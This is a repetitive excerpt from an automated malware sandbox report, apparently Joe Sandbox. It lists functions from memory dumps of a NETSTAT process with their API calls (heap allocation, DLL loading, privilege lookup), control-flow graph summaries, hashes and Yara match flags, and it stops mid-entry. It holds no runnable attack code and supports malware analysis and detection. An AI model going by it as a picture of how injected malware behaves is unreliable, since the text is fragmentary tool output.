                                                                                                                                                      • Source File: 0000001C.00000002.30161938949.0000000003320000.00000040.00000001.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                      • Associated: 0000001C.00000002.30164043056.0000000003449000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001C.00000002.30164124287.000000000344D000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_3320000_NETSTAT.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 298c20a5b64b7866e8a8030bcfbd474e708b80fea851d065efec19721857347c
                                                                                                                                                      • Instruction ID: 8868befe7552c24b460b067d418f46fe2909b999eab3b4e027c9326a0d9e53e8
                                                                                                                                                      • Opcode Fuzzy Hash: 298c20a5b64b7866e8a8030bcfbd474e708b80fea851d065efec19721857347c
                                                                                                                                                      • Instruction Fuzzy Hash: 1290023561248C02D514A15C854474A0509C7D0302F55C815A4414A58DCBA588917121
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 03392B80, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30161938949.0000000003320000.00000040.00000001.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                      • Associated: 0000001C.00000002.30164043056.0000000003449000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001C.00000002.30164124287.000000000344D000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_3320000_NETSTAT.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: dfffe0323e1b2e7a8d83353216644f6b9468a244b02bcf01db9b31313ad0d6f6
                                                                                                                                                      • Instruction ID: 7a838dc85f50ae4f342cd74a7fdf585ab081db87168ff6b57d26ade4eb1d739e
                                                                                                                                                      • Opcode Fuzzy Hash: dfffe0323e1b2e7a8d83353216644f6b9468a244b02bcf01db9b31313ad0d6f6
                                                                                                                                                      • Instruction Fuzzy Hash: B890023561240C42D504A15C4544B460509C7E0302F51C41AA0114A54DCB25C8517521
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 03392BC0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30161938949.0000000003320000.00000040.00000001.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                      • Associated: 0000001C.00000002.30164043056.0000000003449000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001C.00000002.30164124287.000000000344D000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_3320000_NETSTAT.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 7f120de03f885e9042eca355cb7914dd527f6afd9e6d03b7c9ea429b8b5485f1
                                                                                                                                                      • Instruction ID: deef7e65fc46e34a8656dcb50d4cdc3e86f69ed73476f687777c0642c93b0412
                                                                                                                                                      • Opcode Fuzzy Hash: 7f120de03f885e9042eca355cb7914dd527f6afd9e6d03b7c9ea429b8b5485f1
                                                                                                                                                      • Instruction Fuzzy Hash: 6190023561240802D504A59C55486460509C7E0302F51D415A5014955ECB7588917131
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 03392A80, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30161938949.0000000003320000.00000040.00000001.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                      • Associated: 0000001C.00000002.30164043056.0000000003449000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001C.00000002.30164124287.000000000344D000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_3320000_NETSTAT.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 4e2256d1a98407a28fadddcc0f6ae1c416b4e992fd5b6cdb42b72cb98c12eeb6
                                                                                                                                                      • Instruction ID: a83ca03f2f0be5b4a7692762d24bd5361d675374a2de4094b0b65d9bb255048b
                                                                                                                                                      • Opcode Fuzzy Hash: 4e2256d1a98407a28fadddcc0f6ae1c416b4e992fd5b6cdb42b72cb98c12eeb6
                                                                                                                                                      • Instruction Fuzzy Hash: ED900265613404034509B15C4554616450EC7E0202B51C425E1004990DCA3588917125
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 03392AC0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30161938949.0000000003320000.00000040.00000001.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                      • Associated: 0000001C.00000002.30164043056.0000000003449000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001C.00000002.30164124287.000000000344D000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_3320000_NETSTAT.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: abf1701f76db05bdf9ad488ecd7266c548959f806a863e6d6cbf128d285aa663
                                                                                                                                                      • Instruction ID: e6283e9d4b998dafd4e5ec3044aca65e88de80f0500ee9239a21e2833f4a5488
                                                                                                                                                      • Opcode Fuzzy Hash: abf1701f76db05bdf9ad488ecd7266c548959f806a863e6d6cbf128d285aa663
                                                                                                                                                      • Instruction Fuzzy Hash: 35900235A1640C02D554B15C45547460509C7D0302F51C415A0014A54DCB658A5576A1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 033929F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30161938949.0000000003320000.00000040.00000001.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                      • Associated: 0000001C.00000002.30164043056.0000000003449000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001C.00000002.30164124287.000000000344D000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_3320000_NETSTAT.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: d69bfd371a50ce4fe5388c19c653f798a6b97a5f844ce297f1c739a44620eaae
                                                                                                                                                      • Instruction ID: 2ea7db39a2d6ed99f698a8acbf88cdcb90a6f2392ebde1718ea66f29f05af494
                                                                                                                                                      • Opcode Fuzzy Hash: d69bfd371a50ce4fe5388c19c653f798a6b97a5f844ce297f1c739a44620eaae
                                                                                                                                                      • Instruction Fuzzy Hash: 96900229622404030509E55C0744507054AC7D5352351C425F1005950CDB3188616121
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 03392F00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30161938949.0000000003320000.00000040.00000001.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                      • Associated: 0000001C.00000002.30164043056.0000000003449000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001C.00000002.30164124287.000000000344D000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_3320000_NETSTAT.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 1ae6f95df41fd299087a4e831d9bb2048530c497195602ba89cde84882fbf44e
                                                                                                                                                      • Instruction ID: 4bbb7a1c03b645d3436526259878b28c84ddc697af8825a907304c1b9c6ba840
                                                                                                                                                      • Opcode Fuzzy Hash: 1ae6f95df41fd299087a4e831d9bb2048530c497195602ba89cde84882fbf44e
                                                                                                                                                      • Instruction Fuzzy Hash: 05900225622C0442D604A56C4D54B070509C7D0303F51C519A0144954CCE2588616521
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 03392FB0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30161938949.0000000003320000.00000040.00000001.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                      • Associated: 0000001C.00000002.30164043056.0000000003449000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001C.00000002.30164124287.000000000344D000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_3320000_NETSTAT.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: f3a6574eb9d9a130b6e8c45ff8362e0155ba3bc1335b007423056930f92a97cd
                                                                                                                                                      • Instruction ID: a0b301e39943c1ab2c65c9655f519463cc330d2356feef804cbad78720e2e665
                                                                                                                                                      • Opcode Fuzzy Hash: f3a6574eb9d9a130b6e8c45ff8362e0155ba3bc1335b007423056930f92a97cd
                                                                                                                                                      • Instruction Fuzzy Hash: 4D90022565240C02D544B15C8554707050AC7D0602F51C415A0014954DCB26896576B1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 03392E50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30161938949.0000000003320000.00000040.00000001.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                      • Associated: 0000001C.00000002.30164043056.0000000003449000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001C.00000002.30164124287.000000000344D000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_3320000_NETSTAT.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 1014f8de33a0a1211280d52c04ba88979a6c2cc1b04a80873f9be389c5f653e4
                                                                                                                                                      • Instruction ID: 533324404c73e9a3eb7a10579ca4d808affc8dade7fd72b54a0f9a41d3b6d752
                                                                                                                                                      • Opcode Fuzzy Hash: 1014f8de33a0a1211280d52c04ba88979a6c2cc1b04a80873f9be389c5f653e4
                                                                                                                                                      • Instruction Fuzzy Hash: 8790026575240842D504A15C4554B060509C7E1302F51C419E1054954DCB29CC527126
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 03392D10, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30161938949.0000000003320000.00000040.00000001.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                      • Associated: 0000001C.00000002.30164043056.0000000003449000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001C.00000002.30164124287.000000000344D000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_3320000_NETSTAT.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: fe59742f97e58a89143f9f647b53a8fe44fd342504204ee5224d0b1414564b7c
                                                                                                                                                      • Instruction ID: 93ef5795349c135d936a4d0ac5fcba4d2c42d74d5faafc31565a1c4acafff16c
                                                                                                                                                      • Opcode Fuzzy Hash: fe59742f97e58a89143f9f647b53a8fe44fd342504204ee5224d0b1414564b7c
                                                                                                                                                      • Instruction Fuzzy Hash: 4C90023561240813D515A15C4644707050DC7D0242F91C816A0414958DDB668952B121
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 03392DC0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30161938949.0000000003320000.00000040.00000001.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                      • Associated: 0000001C.00000002.30164043056.0000000003449000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001C.00000002.30164124287.000000000344D000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_3320000_NETSTAT.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: ff5a8675e316b2f268023e80aee722e85ab0b605c34389b779d2ceadc5ec8ccf
                                                                                                                                                      • Instruction ID: 41733d23ce4ebea7c63001599fa1fc5a6ac5abe88adafd5c0558513e24d40972
                                                                                                                                                      • Opcode Fuzzy Hash: ff5a8675e316b2f268023e80aee722e85ab0b605c34389b779d2ceadc5ec8ccf
                                                                                                                                                      • Instruction Fuzzy Hash: F190027561240802D544B15C45447460509C7D0302F51C415A5054954ECB698DD57665
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 03392C30, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30161938949.0000000003320000.00000040.00000001.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                      • Associated: 0000001C.00000002.30164043056.0000000003449000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001C.00000002.30164124287.000000000344D000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_3320000_NETSTAT.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 6a8859eb4e1f59659380de6d743e430f748bb5aaf087e9ede29fd61be03d0f30
                                                                                                                                                      • Instruction ID: d689a34bb10ece9f84dbfeba0ded27556c76b391f5ff6496666a1c5ce9dcf14d
                                                                                                                                                      • Opcode Fuzzy Hash: 6a8859eb4e1f59659380de6d743e430f748bb5aaf087e9ede29fd61be03d0f30
                                                                                                                                                      • Instruction Fuzzy Hash: 2C90022D62340402D584B15C554860A0509C7D1203F91D819A0005958CCE2588696321
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 033934E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30161938949.0000000003320000.00000040.00000001.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                      • Associated: 0000001C.00000002.30164043056.0000000003449000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001C.00000002.30164124287.000000000344D000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_3320000_NETSTAT.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 78b7202ddd8b2b5e28e79abde3d8eadd0b6ee41fcd1532cd7b0bda923de7c352
                                                                                                                                                      • Instruction ID: 4f05907cbc0bc0b6f76737579aef5637bc00b4ce5d940a09b9b5056db517a70b
                                                                                                                                                      • Opcode Fuzzy Hash: 78b7202ddd8b2b5e28e79abde3d8eadd0b6ee41fcd1532cd7b0bda923de7c352
                                                                                                                                                      • Instruction Fuzzy Hash: 61900235A1650802D504A15C46547061509C7D0202F61C815A0414968DCBA5895175A2
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 007E88E2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 27memoryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 428 7e88e2-7e8906 429 7e890c-7e8921 RtlFreeHeap 428->429 430 7e8907 call 7e91e0 428->430 430->429
                                                                                                                                                      APIs
                                                                                                                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,007D3B93), ref: 007E891D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30154030326.00000000007D0000.00000040.00020000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_7d0000_NETSTAT.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FreeHeap
                                                                                                                                                      • String ID: .z`
                                                                                                                                                      • API String ID: 3298025750-1441809116
                                                                                                                                                      • Opcode ID: ac1790c454beff9ea0d608bf1134bd1a52768fcd95365797c4fcb64701a2fe7d
                                                                                                                                                      • Instruction ID: 9cd2eed06be989ea3ad13b906f44a0acf6b2a112364ffa27f665896b44dea49b
                                                                                                                                                      • Opcode Fuzzy Hash: ac1790c454beff9ea0d608bf1134bd1a52768fcd95365797c4fcb64701a2fe7d
                                                                                                                                                      • Instruction Fuzzy Hash: 8AF065B1200258ABDB14DF68DC49ED737A8EF84750F114598FD4857241C631E914CBA0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 007E88F0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 434 7e88f0-7e8921 call 7e91e0 RtlFreeHeap
                                                                                                                                                      APIs
                                                                                                                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,007D3B93), ref: 007E891D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30154030326.00000000007D0000.00000040.00020000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_7d0000_NETSTAT.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FreeHeap
                                                                                                                                                      • String ID: .z`
                                                                                                                                                      • API String ID: 3298025750-1441809116
                                                                                                                                                      • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                      • Instruction ID: 74a8389c031cce06acbad1c15ed534c14a351a19387ce11243640ccdc3c994b4
                                                                                                                                                      • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                      • Instruction Fuzzy Hash: 6BE04FB1200208ABD714DF59CC49EA777ACEF88750F014558FE0857241C630F910CAF0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 007E88B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 431 7e88b0-7e88e1 call 7e91e0 RtlAllocateHeap
                                                                                                                                                      APIs
                                                                                                                                                      • RtlAllocateHeap.NTDLL(65~,?,007E3CAF,007E3CAF,?,007E3536,?,?,?,?,?,00000000,00000000,?), ref: 007E88DD
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30154030326.00000000007D0000.00000040.00020000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_7d0000_NETSTAT.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                      • String ID: 65~
                                                                                                                                                      • API String ID: 1279760036-3391872701
                                                                                                                                                      • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                                      • Instruction ID: 003d7e7d8eda1beaa158293db2c79c5004b233d83a004add0363653977e235ec
                                                                                                                                                      • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                                      • Instruction Fuzzy Hash: 1CE046B2200208ABDB14EF99CC45EA777ACEF88750F118558FE089B242C630F910CBF0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 007D9B40, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 550 7d9b40-7d9b69 call 7eaf70 553 7d9b6f-7d9b7d call 7eb390 550->553 554 7d9b6b-7d9b6e 550->554 557 7d9b8d-7d9b9e call 7e9720 553->557 558 7d9b7f-7d9b8a call 7eb610 553->558 563 7d9bb7-7d9bba 557->563 564 7d9ba0-7d9bb4 LdrLoadDll 557->564 558->557 564->563
                                                                                                                                                      APIs
                                                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 007D9BB2
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30154030326.00000000007D0000.00000040.00020000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_7d0000_NETSTAT.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Load
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2234796835-0
                                                                                                                                                      • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                                                                                                                      • Instruction ID: e24fb29bbf69e043bc2f35cc103a0132a162de5027e5b0ea48ca2996ccea926b
                                                                                                                                                      • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                                                                                                                      • Instruction Fuzzy Hash: 4B011EB5E0020DBBDF10DBA5EC46F9EB7789B58308F004196AA0897285F635EB18CB91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 007D9B34, Relevance: 1.5, APIs: 1, Instructions: 40libraryloaderCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 565 7d9b34-7d9b3f 566 7d9b96-7d9b9e 565->566 567 7d9b41-7d9b5c 565->567 568 7d9bb7-7d9bba 566->568 569 7d9ba0-7d9bb4 LdrLoadDll 566->569 570 7d9b64-7d9b69 567->570 571 7d9b5f call 7eaf70 567->571 569->568 572 7d9b6f-7d9b7d call 7eb390 570->572 573 7d9b6b-7d9b6e 570->573 571->570 576 7d9b8d-7d9b91 call 7e9720 572->576 577 7d9b7f-7d9b8a call 7eb610 572->577 576->566 577->576
                                                                                                                                                      APIs
                                                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 007D9BB2
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30154030326.00000000007D0000.00000040.00020000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_7d0000_NETSTAT.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Load
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2234796835-0
                                                                                                                                                      • Opcode ID: 054cadc7798dd47ab44786108dc259e6bc29ebfbb2a475caf3b56ea30b4f020a
                                                                                                                                                      • Instruction ID: 38b439142b40e3f7e2f335da21e32dbfae61e18b060606be372463ef3fb2e6f5
                                                                                                                                                      • Opcode Fuzzy Hash: 054cadc7798dd47ab44786108dc259e6bc29ebfbb2a475caf3b56ea30b4f020a
                                                                                                                                                      • Instruction Fuzzy Hash: C4F062B5E4010DBBDF10DAD5E842FDDB7B89B15308F0081A6ED1C9F281F574EA498B91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 007E8A50, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,007DCFC2,007DCFC2,?,00000000,?,?), ref: 007E8A80
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30154030326.00000000007D0000.00000040.00020000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_7d0000_NETSTAT.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: LookupPrivilegeValue
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3899507212-0
                                                                                                                                                      • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                      • Instruction ID: 62f7842b0143f7f7308041f12754e8d550ade0e7ba16967841278a8cf2e1b777
                                                                                                                                                      • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                      • Instruction Fuzzy Hash: 57E01AB1200208ABDB10DF49CC85EE737ADAF88650F018154FA0857241C934E910CBF5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 007DD430, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,007D7C83,?), ref: 007DD45B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30154030326.00000000007D0000.00000040.00020000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_7d0000_NETSTAT.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorMode
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2340568224-0
                                                                                                                                                      • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
